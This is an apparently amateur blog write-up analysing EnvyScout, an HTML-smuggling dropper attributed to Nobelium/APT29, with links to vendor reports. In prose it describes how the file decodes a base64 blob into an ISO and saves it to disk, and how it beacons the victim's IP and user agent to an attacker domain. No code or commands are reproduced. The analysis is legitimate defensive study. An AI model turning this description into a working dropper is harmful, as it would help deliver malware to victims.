Analyzing Nobelium's HTML Dropper - EnvyScout

Recently, I got my hands on a malware sample used by Nobelium / APT29 and wanted to use this opportunity to learn and revise my malware analysis skills 😄

Please review my work and provide feedback at my n00b-ish attempt at Malware analysis 😄

Analysis Summary:

• [ASSUMPTION] Attacker sends a malicious HTML file or a link to the victim

• [ASSUMPTION] Victim opens the file

• There's a hardcoded string (~2.8 MB) that's converted from base64 to an Array Buffer

• This array buffer (which is an ISO file) is written onto disk using Inbuilt API calls

• This ISO file contains 3 files: an exe and 2 DLLs. While these were interesting, it's a story for another day.

Analysis In-Detail:

At the first look, the HTML dropper looks to be built in a not-so-sophisticated way as we encounter a malicious domain where the malware is communicating. What's more eye-popping for a malware analyst than a malicious domain hardcoded in a malware 😂

Analyzing the code deeply, the first function is taking an input text and using the "window.navigator.msSaveOrOpenBlob" API call to download a file. Now, I'm not a JS expert by any means but I can do good googl-ing (if that's even a word, lol) and looks like our folks have taken some inspiration (pun intended) from CodePen. After all, they are like normal developers who love copying code from online 😂

Moving On, they seem to be sending a beacon-ping (kind off like a Hi, someone clicked me) to their malicious URL along with the IP of the user and the user agent. I'm not sure why they were sending a request to IPIFY. I assume they wanted to get the current IP of the user but they're not really utilizing it. Seems like unfinished code (not surprised). However, this seems to be just a function and we'll have to see when this is actually called.

Further down, there seems to be a string (~2.8 MB) which is base64 encoded.

Below that is the function which is kind off the one which does all the magic; Again, not a JS expert but looks like they copied yet another code and this time from StackOverflow.

Combining both the pieces together, it looks like the JS is trying to put the base64 string into an array buffer and write to the disk using the previously discovered function. Dynamic analysis indicates that it's an ISO file containing possibly malicious samples.

There seems to 2 DLLs and 1 Exe that were dropped as a part of the malware package. Looks interesting and will definitely keep me occupied after work 🥷

This looks like a previously documented variant

• https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

• https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/

References:

• https://digital.nhs.uk/cyber-alerts/2021/cc-3878

• https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage

• https://blog.sekoia.io/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/